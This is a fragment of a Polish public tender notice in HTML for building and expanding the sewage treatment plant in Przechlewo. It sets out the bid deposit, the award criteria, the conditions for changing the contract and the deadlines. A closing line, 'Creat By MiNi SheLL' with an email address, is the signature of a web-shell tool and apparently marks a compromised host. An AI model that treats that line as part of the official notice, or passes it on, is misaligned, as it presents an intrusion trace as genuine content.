            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.	Wykonawca zobowiązany jest wnieść wadium w wysokości 200.000,00 zł (słownie: dwieście tysięcy złotych 00/100).
2.	Wadium może być wniesione w jednej lub kilku następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo  kredytowej, gwarancjach z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia
9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U z 2014r. poz. 1804 oraz Dz. U. z 2015 r. poz. 978 i 1240).
3.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego Bank Spółdzielczy w Człuchowie O/Przechlewo nr rachunku: 68 9326 0006 0060 2321 2000 0010. Na przelewie należy umieścić informację Wadium do przetargu nieograniczonego na Budowę, przebudowę i rozbudowę Komunalnej Oczyszczalni Ścieków w Przechlewie.
4.	W przypadku wniesienia wadium w innej formie niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego, a kserokopię dokumentu poświadczoną za zgodność z oryginałem należy załączyć do oferty
5.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 1 i ust. 1a ustawy Prawo zamówień publicznych.
6.	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
7.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie punktu 5, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta zastanie wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
8.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
9.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a ustawy Prawo zamówień publicznych, z przyczyn leżących po stronie Wykonawcy, nie złożył dokumentów lub oświadczeń potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych, oświadczenia o którym mowa w art. 25a ust. 1, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
10.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy  sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji</td><td>15</td></tr><tr><td>Doświadczenie kierownika budowy</td><td>10</td></tr><tr><td>Doświadczenie technologa</td><td>15</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Zmiana wysokości należnego Wykonawcy wynagrodzenia może nastąpić w przypadku zmiany:
1)  stawki podatku od towarów i usług,
2) wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,
3) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne
- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę, przy zastosowaniu następujących zasad:
	informacja o zmianie kwot, o których mowa w ust. 1 pkt. 1-3 została podana do publicznej wiadomości po terminie składania ofert w postępowaniu, w wyniku, którego została zawarta niniejsza umowa,
	Wykonawca wystąpił do Zamawiającego z pisemnym wnioskiem o zmianę wynagrodzenia, a Zamawiający go zaakceptował,
	Wykonawca we wniosku, o którym mowa winien szczegółowo udowodnić wpływ zmian kwot, o których mowa w ust. 1 pkt. 1-3 na koszty wykonania przedmiotu niniejszej umowy,
	Zamawiający ma obowiązek rozpatrzyć wniosek, o którym mowa w pkt. 2 i 3 w terminie 14 dni od jego otrzymania.
4) na skutek wystąpienia robót dodatkowych, które są niezbędne do prawidłowego wykonania zamówienia, które nie zostały objęte zamówieniem podstawowym, a ich niewykonanie spowodowałoby nieprawidłowe wykonanie przedmiotu zamówienia podstawowego, co wynikło z nieprzewidywalnej sytuacji, niezależnej od Zamawiającego i spełnione są pozostałe warunki określone w art. 144 ust. 1 pkt 2) Pzp:
- zmiana wykonawcy nie może zostać dokonana z powodów ekonomicznych lub technicznych, w szczególności dotyczących zamienności lub interoperacyjności sprzętu, usług lub instalacji, zamówionych w ramach zamówienia podstawowego,
- zmiana wykonawcy spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów dla zamawiającego,
- wartość każdej kolejnej zmiany nie przekracza 50% wartości zamówienia określonej pierwotnie w umowie.
Wykonawca zobowiązany jest wykonać te roboty przy jednoczesnym zachowaniu tych samych norm, standardów i parametrów, co dla zamówienia podstawowego. Zmiana będzie dokonana na podstawie zaakceptowanego przez Zamawiającego protokołu konieczności, zawierającego zakres robót oraz kosztorysu robót dodatkowych, określającego szacunkową wartość robót, zatwierdzonego  przez  Inspektora Nadzoru. Roboty zostaną zlecone do realizacji dopiero po akceptacji przez Zamawiającego i podpisaniu przez strony aneksu do umowy. Za roboty dodatkowe strony ustalą wynagrodzenie w oparciu o przewidziane w ofercie składniki cenotwórcze, zawarte w kosztorysie ofertowym sporządzonym przez Wykonawcę dla zamówienia podstawowego. W przypadku wystąpienia robót, dla których nie przewidziano w ofercie dla zamówienia podstawowego składników cenotwórczych, Wykonawca będzie stosował ceny materiałów, pracy sprzętu nie wyższe niż średnie kwartalne ceny obowiązujące w kwartale składania oferty podstawowej, publikowane w wydawnictwie SEKOCENBUD, natomiast stawki roboczogodziny, kosztów pośrednich, zysku oraz kosztów zakupu będą stosowane stawki dla danej branży zgodnie ze złożoną przez Wykonawcę ofertą dla zamówienia podstawowego.

Zmiana wynagrodzenia może nastąpić wyłącznie na podstawie pisemnego aneksu do niniejszej umowy, pod rygorem nieważności.

2. Zamawiający dopuszcza zmiany w treści postanowień umowy w formie pisemnej, pod rygorem nieważności, w następujących przypadkach:
1) w zakresie przedłużenia terminu wykonania umowy, w formie aneksu do umowy, w następujących przypadkach:
a) wystąpienia okoliczności siły wyższej (za siłę wyższą uznaje się okoliczności o charakterze zewnętrznym, mające nadzwyczajny charakter, nie dające się przewidzieć, oraz którym nie można zapobiec; w szczególności są to zdarzenia o charakterze katastrof przyrodniczych lub nadzwyczajne zaburzenia życia zbiorowego (wojna, stan wyjątkowy, ogłoszenie stanu klęski żywiołowej); nie uznaje się za siłę wyższa strajku, wzrostu cen materiałów, wyrobów, urządzeń lub usług),
b) przez wstrzymanie robót przez właściwe służby i inspekcje lub przez inspektora nadzoru inwestorskiego,
c)	gdy obowiązujące przepisy (ST, Polskie Normy) nie dopuszczają do realizacji lub nakazują wstrzymanie robót,
d)	wystąpieniem okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności,
e)	wystąpienia niekorzystnych warunków atmosferycznych, odbiegających znacząco od typowych, uniemożliwiających prowadzenie robót lub wykonanie procedur odbiorowych (przeprowadzenie prób i sprawdzeń) przez okres co najmniej 14 dni jednorazowo, uniemożliwiających prawidłowe zrealizowanie (jakościowe, dla których określona odpowiednimi normami technologia wymaga właściwych warunków atmosferycznych, terminowe) robót, pomimo zastosowania wszelkich dostępnych środków technicznych przez Wykonawcę,
f)	w przypadku wystąpienia warunków geologicznych, geotechnicznych lub hydrologicznych odbiegających w sposób istotny od przyjętych w dokumentacji projektowej,
g)	w przypadku występowania warunków terenu budowy odbiegających w sposób istotny od przyjętych w dokumentacji projektowej, m.in. napotkania niezinwentaryzowanych lub błędnie zinwentaryzowanych sieci, instalacji lub innych obiektów budowlanych,
h)	wydłużenia terminu zakończenia realizacji umowy na pisemny wniosek Wykonawcy, jeżeli ze względu na konieczność wykonania niezbędnych robót dodatkowych, realizowanych zgodnie z art. 144 ust. 1 pkt 2) ustawy, niemożliwe będzie dotrzymanie terminu zakończenia realizacji robót budowlanych podstawowych określonych w niniejszej umowie.

-przedłużenie terminu wykonania robót nastąpi o tyle dni, ile trwała przeszkoda w ich wykonaniu, bez możliwości ubiegania się o odszkodowanie przez Wykonawcę. Podstawą do przesunięcia terminu jest wpis do dziennika budowy, potwierdzony przez inspektora nadzoru inwestorskiego oraz wniosek Wykonawcy dostarczony Zamawiającemu, 

2)	związane ze zmianą powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy; w takim przypadku zmianie ulegną te zapisy umowy, na które zmiana obowiązujących przepisów ma wpływ.

3.	Za zgodą Zamawiającego Wykonawca może dokonać zmiany w zakresie podwykonawcy będącego podmiotem, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 22a ust. 1 pzp, w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca jest zobowiązany wykazać Zamawiającemu, iż proponowany inny Podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
4.	Wykonawca nie będzie uprawniony do żadnego przedłużenia terminu wykonania umowy i zwiększenia wynagrodzenia w zakresie, w jakim konieczność dokonania zmiany została spowodowana przez jakikolwiek błąd lub opóźnienie ze strony Wykonawcy, włącznie z błędem lub opóźnionym dostarczeniem jakiegokolwiek dokumentu wynikającego z obowiązków Wykonawcy. 
5.	W przypadku propozycji zmiany umowy, polegającej na zwiększeniu wartości  umowy, zmiana ta uwarunkowana jest uprzednim wyrażeniem zgody przez Instytucję Wdrażającą (Narodowy Fundusz Ochrony Środowiska). W tym celu Zamawiający niezwłocznie przesyła do Instytucji Wdrażającej projekt zmiany umowy z Wykonawcą wraz z podaniem uzasadnienia faktycznego i prawnego dla proponowanej zmiany umowy.
6.	Strony dopuszczają zmiany postanowień niniejszej umowy w przypadku zmiany postanowień umowy o dofinansowanie Projektu w ramach Programu Operacyjnego Infrastruktura i Środowisko na lata 2014-2020, a mające wpływ na postanowienia niniejszej umowy.
7.	Zmiany umowy podlegają ogłoszeniu w Biuletynie Zamówień Publicznych.
8.	Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy pzp:
a)	zmiana danych teleadresowych, zmiany osób reprezentujących Strony,
b)	zmiana harmonogramu rzeczowo-finansowego bez zmiany terminu końcowego wykonania zadania i/ lub zmiany wartości określonych w § 3 ust. 1
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 09/01/2017, godzina: 9:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Oferty wraz złącznikami nalęzy sporządzić w języku polskim.<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                tak
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com